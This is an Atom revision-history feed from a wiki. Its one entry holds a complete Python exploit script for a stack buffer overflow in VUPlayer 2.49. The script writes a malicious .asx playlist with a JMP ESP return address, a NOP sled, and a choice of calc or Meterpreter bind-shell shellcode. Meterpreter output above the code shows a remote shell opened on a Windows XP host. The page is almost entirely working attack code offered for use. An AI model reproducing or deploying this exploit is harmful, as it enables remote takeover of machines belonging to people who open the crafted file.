<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=VUPlayer_2.49%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>VUPlayer 2.49堆棧緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=VUPlayer_2.49%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=VUPlayer_2.49%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-17T10:39:16Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=VUPlayer_2.49%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=697&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #[*] Started bind handler #[*] Starting the payload handler... #[*] Sending stage (749056 bytes) to 192.168.164.147 #[*] Meterpreter session 2 opened (192.168.16...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=VUPlayer_2.49%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=697&amp;oldid=prev"/>
		<updated>2021-03-27T03:06:21Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #[*] Started bind handler #[*] Starting the payload handler... #[*] Sending stage (749056 bytes) to 192.168.164.147 #[*] Meterpreter session 2 opened (192.168.16...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#[*] Started bind handler&lt;br /&gt;
#[*] Starting the payload handler...&lt;br /&gt;
#[*] Sending stage (749056 bytes) to 192.168.164.147&lt;br /&gt;
#[*] Meterpreter session 2 opened (192.168.164.141:53820 -&amp;gt; 192.168.164.147:4444) at 2011-07-02 04:08:05 +0530&lt;br /&gt;
#&lt;br /&gt;
#meterpreter &amp;gt; shell&lt;br /&gt;
#Process 2664 created.&lt;br /&gt;
#Channel 1 created.&lt;br /&gt;
#Microsoft Windows XP [Version 5.1.2600]&lt;br /&gt;
#(C) Copyright 1985-2001 Microsoft Corp.&lt;br /&gt;
#&lt;br /&gt;
#C:\Documents and Settings\Administrator\Desktop&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
from struct import pack&lt;br /&gt;
import os&lt;br /&gt;
import sys&lt;br /&gt;
en = '''\&lt;br /&gt;
&lt;br /&gt;
|| VUPlayer v2.49 Stack BufferOverflow Exploit (calc/bind) ||&lt;br /&gt;
                Author : Zer0 Thunder&lt;br /&gt;
&lt;br /&gt;
------------------------------------------------------------&lt;br /&gt;
							 &lt;br /&gt;
Select the shellcode you want\n&lt;br /&gt;
1. Calculator &lt;br /&gt;
2. Meterpreter BIND Shell &lt;br /&gt;
&lt;br /&gt;
Enter the Selected Shellcode Number&lt;br /&gt;
'''&lt;br /&gt;
print en&lt;br /&gt;
shell = input(&amp;quot;:&amp;quot;)&lt;br /&gt;
dimbo		= &amp;quot;crash.asx&amp;quot;&lt;br /&gt;
header1		= &amp;quot;\x3c\x61\x73\x78\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x22\x33\x2e\x30\x22\x20\x3e\n&amp;quot;&lt;br /&gt;
header2n6	= &amp;quot;\x3c\x65\x6e\x74\x72\x79\x3e\n&amp;quot;&lt;br /&gt;
header3		= &amp;quot;\x3c\x74\x69\x74\x6c\x65\x3e\x65\x78\x70\x6c\x6f\x69\x74\x2e\x6d\x70\x33\x3c\x2f\x74\x69\x74\x6c\x65\x3e\n&amp;quot;&lt;br /&gt;
header4		= &amp;quot;\x3c\x72\x65\x66\x20\x68\x72\x65\x66\x20\x3d&amp;quot;&lt;br /&gt;
header5		= &amp;quot;\x22\x20\x2f\x3e\x3c\x65\x6e\x74\x72\x79\x3e&amp;quot;&lt;br /&gt;
header7		= &amp;quot;\n\x3c\x2f\x61\x73\x78\x3e&amp;quot;&lt;br /&gt;
junk		= &amp;quot;\x41&amp;quot; * 1012&lt;br /&gt;
junk2		= pack('&amp;lt;L',0x1010539F) #JMP ESP BASSWMA.dll&lt;br /&gt;
nops 		= &amp;quot;\x90&amp;quot; * 20&lt;br /&gt;
#Calc.exe&lt;br /&gt;
&lt;br /&gt;
calc= (&amp;quot;\xda\xc1\xd9\x74\x24\xf4\x5a\x4a\x4a\x4a\x4a\x43\x43\x43\x43&amp;quot;&lt;br /&gt;
&amp;quot;\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50&amp;quot;&lt;br /&gt;
&amp;quot;\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54&amp;quot;&lt;br /&gt;
&amp;quot;\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38&amp;quot;&lt;br /&gt;
&amp;quot;\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x43\x30\x43\x30&amp;quot;&lt;br /&gt;
&amp;quot;\x43\x30\x43\x50\x4b\x39\x4b\x55\x56\x51\x58\x52\x52\x44\x4c&amp;quot;&lt;br /&gt;
&amp;quot;\x4b\x50\x52\x56\x50\x4c\x4b\x56\x32\x54\x4c\x4c\x4b\x56\x32&amp;quot;&lt;br /&gt;
&amp;quot;\x45\x44\x4c\x4b\x52\x52\x47\x58\x54\x4f\x4e\x57\x50\x4a\x56&amp;quot;&lt;br /&gt;
&amp;quot;\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e\x4c\x47\x4c\x45\x31&amp;quot;&lt;br /&gt;
&amp;quot;\x43\x4c\x54\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54\x4d\x43&amp;quot;&lt;br /&gt;
&amp;quot;\x31\x4f\x37\x4d\x32\x5a\x50\x56\x32\x51\x47\x4c\x4b\x56\x32&amp;quot;&lt;br /&gt;
&amp;quot;\x54\x50\x4c\x4b\x51\x52\x47\x4c\x43\x31\x4e\x30\x4c\x4b\x47&amp;quot;&lt;br /&gt;
&amp;quot;\x30\x54\x38\x4d\x55\x49\x50\x43\x44\x51\x5a\x45\x51\x4e\x30&amp;quot;&lt;br /&gt;
&amp;quot;\x56\x30\x4c\x4b\x51\x58\x54\x58\x4c\x4b\x56\x38\x47\x50\x43&amp;quot;&lt;br /&gt;
&amp;quot;\x31\x58\x53\x5a\x43\x47\x4c\x47\x39\x4c\x4b\x47\x44\x4c\x4b&amp;quot;&lt;br /&gt;
&amp;quot;\x43\x31\x58\x56\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e\x4c\x49&amp;quot;&lt;br /&gt;
&amp;quot;\x51\x58\x4f\x54\x4d\x45\x51\x58\x47\x47\x48\x4d\x30\x52\x55&amp;quot;&lt;br /&gt;
&amp;quot;\x4b\x44\x45\x53\x43\x4d\x5a\x58\x47\x4b\x43\x4d\x47\x54\x52&amp;quot;&lt;br /&gt;
&amp;quot;\x55\x5a\x42\x50\x58\x4c\x4b\x51\x48\x51\x34\x43\x31\x49\x43&amp;quot;&lt;br /&gt;
&amp;quot;\x52\x46\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x51\x48\x45\x4c\x45&amp;quot;&lt;br /&gt;
&amp;quot;\x51\x58\x53\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x58\x50\x4d\x59&amp;quot;&lt;br /&gt;
&amp;quot;\x47\x34\x51\x34\x47\x54\x51\x4b\x51\x4b\x45\x31\x51\x49\x51&amp;quot;&lt;br /&gt;
&amp;quot;\x4a\x56\x31\x4b\x4f\x4d\x30\x50\x58\x51\x4f\x51\x4a\x4c\x4b&amp;quot;&lt;br /&gt;
&amp;quot;\x45\x42\x5a\x4b\x4c\x46\x51\x4d\x52\x4a\x43\x31\x4c\x4d\x4d&amp;quot;&lt;br /&gt;
&amp;quot;\x55\x4e\x59\x43\x30\x45\x50\x45\x50\x56\x30\x52\x48\x56\x51&amp;quot;&lt;br /&gt;
&amp;quot;\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x4f&amp;quot;&lt;br /&gt;
&amp;quot;\x45\x49\x32\x50\x56\x45\x38\x4f\x56\x5a\x35\x4f\x4d\x4d\x4d&amp;quot;&lt;br /&gt;
&amp;quot;\x4b\x4f\x4e\x35\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4d\x50\x4b&amp;quot;&lt;br /&gt;
&amp;quot;\x4b\x4d\x30\x52\x55\x45\x55\x4f\x4b\x51\x57\x52\x33\x52\x52&amp;quot;&lt;br /&gt;
&amp;quot;\x52\x4f\x52\x4a\x43\x30\x56\x33\x4b\x4f\x4e\x35\x45\x33\x45&amp;quot;&lt;br /&gt;
&amp;quot;\x31\x52\x4c\x52\x43\x56\x4e\x45\x35\x54\x38\x43\x55\x43\x30&amp;quot;&lt;br /&gt;
&amp;quot;\x41\x41&amp;quot;)&lt;br /&gt;
#meterpreter/bind_tcp LPORT=4444&lt;br /&gt;
&lt;br /&gt;
bind = (&amp;quot;\x89\xe2\xda\xcd\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49\x43&amp;quot;&lt;br /&gt;
&amp;quot;\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34&amp;quot;&lt;br /&gt;
&amp;quot;\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41&amp;quot;&lt;br /&gt;
&amp;quot;\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58&amp;quot;&lt;br /&gt;
&amp;quot;\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4c\x49\x43\x30&amp;quot;&lt;br /&gt;
&amp;quot;\x43\x30\x43\x30\x43\x50\x4b\x39\x4b\x55\x50\x31\x58\x52\x43&amp;quot;&lt;br /&gt;
&amp;quot;\x54\x4c\x4b\x56\x32\x50\x30\x4c\x4b\x51\x42\x54\x4c\x4c\x4b&amp;quot;&lt;br /&gt;
&amp;quot;\x51\x42\x45\x44\x4c\x4b\x43\x42\x56\x48\x54\x4f\x58\x37\x51&amp;quot;&lt;br /&gt;
&amp;quot;\x5a\x47\x56\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c&amp;quot;&lt;br /&gt;
&amp;quot;\x43\x51\x43\x4c\x54\x42\x56\x4c\x51\x30\x49\x51\x58\x4f\x54&amp;quot;&lt;br /&gt;
&amp;quot;\x4d\x45\x51\x58\x47\x4b\x52\x4c\x30\x51\x42\x56\x37\x4c\x4b&amp;quot;&lt;br /&gt;
&amp;quot;\x51\x42\x52\x30\x4c\x4b\x47\x32\x47\x4c\x43\x31\x58\x50\x4c&amp;quot;&lt;br /&gt;
&amp;quot;\x4b\x51\x50\x54\x38\x4c\x45\x4f\x30\x52\x54\x51\x5a\x43\x31&amp;quot;&lt;br /&gt;
&amp;quot;\x4e\x30\x56\x30\x4c\x4b\x51\x58\x52\x38\x4c\x4b\x56\x38\x47&amp;quot;&lt;br /&gt;
&amp;quot;\x50\x43\x31\x58\x53\x4b\x53\x47\x4c\x51\x59\x4c\x4b\x56\x54&amp;quot;&lt;br /&gt;
&amp;quot;\x4c\x4b\x43\x31\x49\x46\x56\x51\x4b\x4f\x50\x31\x4f\x30\x4e&amp;quot;&lt;br /&gt;
&amp;quot;\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x4f\x37\x56\x58\x4b\x50&amp;quot;&lt;br /&gt;
&amp;quot;\x54\x35\x4b\x44\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x47&amp;quot;&lt;br /&gt;
&amp;quot;\x54\x43\x45\x5a\x42\x50\x58\x4c\x4b\x50\x58\x56\x44\x45\x51&amp;quot;&lt;br /&gt;
&amp;quot;\x58\x53\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45&amp;quot;&lt;br /&gt;
&amp;quot;\x4c\x43\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x58\x50&amp;quot;&lt;br /&gt;
&amp;quot;\x4c\x49\x47\x34\x51\x34\x51\x34\x51\x4b\x51\x4b\x43\x51\x50&amp;quot;&lt;br /&gt;
&amp;quot;\x59\x50\x5a\x50\x51\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x51\x4a&amp;quot;&lt;br /&gt;
&amp;quot;\x4c\x4b\x52\x32\x5a\x4b\x4c\x46\x51\x4d\x43\x58\x56\x53\x47&amp;quot;&lt;br /&gt;
&amp;quot;\x42\x45\x50\x45\x50\x45\x38\x52\x57\x43\x43\x50\x32\x51\x4f&amp;quot;&lt;br /&gt;
&amp;quot;\x56\x34\x45\x38\x50\x4c\x52\x57\x47\x56\x43\x37\x4b\x4f\x49&amp;quot;&lt;br /&gt;
&amp;quot;\x45\x4f\x48\x4c\x50\x45\x51\x43\x30\x45\x50\x56\x49\x58\x44&amp;quot;&lt;br /&gt;
&amp;quot;\x50\x54\x50\x50\x52\x48\x51\x39\x4b\x30\x52\x4b\x43\x30\x4b&amp;quot;&lt;br /&gt;
&amp;quot;\x4f\x58\x55\x50\x50\x50\x50\x50\x50\x56\x30\x51\x50\x50\x50&amp;quot;&lt;br /&gt;
&amp;quot;\x51\x50\x56\x30\x52\x48\x4b\x5a\x54\x4f\x49\x4f\x4b\x50\x4b&amp;quot;&lt;br /&gt;
&amp;quot;\x4f\x58\x55\x4c\x57\x50\x31\x49\x4b\x56\x33\x43\x58\x43\x32&amp;quot;&lt;br /&gt;
&amp;quot;\x45\x50\x54\x51\x51\x4c\x4c\x49\x4d\x36\x43\x5a\x52\x30\x50&amp;quot;&lt;br /&gt;
&amp;quot;\x56\x50\x57\x52\x48\x49\x52\x49\x4b\x50\x37\x43\x57\x4b\x4f&amp;quot;&lt;br /&gt;
&amp;quot;\x58\x55\x56\x33\x51\x47\x43\x58\x58\x37\x4d\x39\x56\x58\x4b&amp;quot;&lt;br /&gt;
&amp;quot;\x4f\x4b\x4f\x49\x45\x50\x53\x56\x33\x50\x57\x45\x38\x43\x44&amp;quot;&lt;br /&gt;
&amp;quot;\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x51\x47\x4c\x57\x45&amp;quot;&lt;br /&gt;
&amp;quot;\x38\x54\x35\x52\x4e\x50\x4d\x45\x31\x4b\x4f\x49\x45\x52\x4a&amp;quot;&lt;br /&gt;
&amp;quot;\x43\x30\x43\x5a\x54\x44\x51\x46\x51\x47\x52\x48\x45\x52\x4e&amp;quot;&lt;br /&gt;
&amp;quot;\x39\x4f\x38\x51\x4f\x4b\x4f\x58\x55\x4c\x4b\x50\x36\x52\x4a&amp;quot;&lt;br /&gt;
&amp;quot;\x51\x50\x52\x48\x43\x30\x54\x50\x43\x30\x45\x50\x56\x36\x43&amp;quot;&lt;br /&gt;
&amp;quot;\x5a\x45\x50\x43\x58\x56\x38\x4f\x54\x51\x43\x4b\x55\x4b\x4f&amp;quot;&lt;br /&gt;
&amp;quot;\x58\x55\x4c\x53\x50\x53\x43\x5a\x43\x30\x56\x36\x50\x53\x51&amp;quot;&lt;br /&gt;
&amp;quot;\x47\x52\x48\x43\x32\x4e\x39\x58\x48\x51\x4f\x4b\x4f\x49\x45&amp;quot;&lt;br /&gt;
&amp;quot;\x43\x31\x49\x53\x51\x39\x4f\x36\x4d\x55\x4b\x46\x54\x35\x5a&amp;quot;&lt;br /&gt;
&amp;quot;\x4c\x4f\x33\x41\x41&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
if shell == 1:&lt;br /&gt;
	print &amp;quot;You Have Selected Calculator\n&amp;quot;&lt;br /&gt;
	junk3 	= &amp;quot;\x43&amp;quot; * (2000-len(header1+header2n6+header3+header4+junk+junk2+nops+calc+header5+header7))&lt;br /&gt;
	payload 	= header1+header2n6+header3+header4+junk+junk2+nops+calc+junk3+header5+header7&lt;br /&gt;
elif shell == 2:&lt;br /&gt;
	print &amp;quot;You Have Selected BIND Shell\n&amp;quot;&lt;br /&gt;
	junk3 	= &amp;quot;\x43&amp;quot; * (2000-len(header1+header2n6+header3+header4+junk+junk2+nops+bind+header5+header7))&lt;br /&gt;
	payload 	= header1+header2n6+header3+header4+junk+junk2+nops+bind+junk3+header5+header7&lt;br /&gt;
else:&lt;br /&gt;
	print &amp;quot;Wrong input&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;Have Fun !!! &amp;quot;&lt;br /&gt;
file = open(dimbo , 'w')&lt;br /&gt;
file.write(payload)&lt;br /&gt;
file.close()&lt;br /&gt;
&lt;br /&gt;
#E-mail - neonwarlock@live.com&lt;br /&gt;
#Site/Blog - http://blog.zt-security.com/&lt;br /&gt;
# Sri Lankan Hackers&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>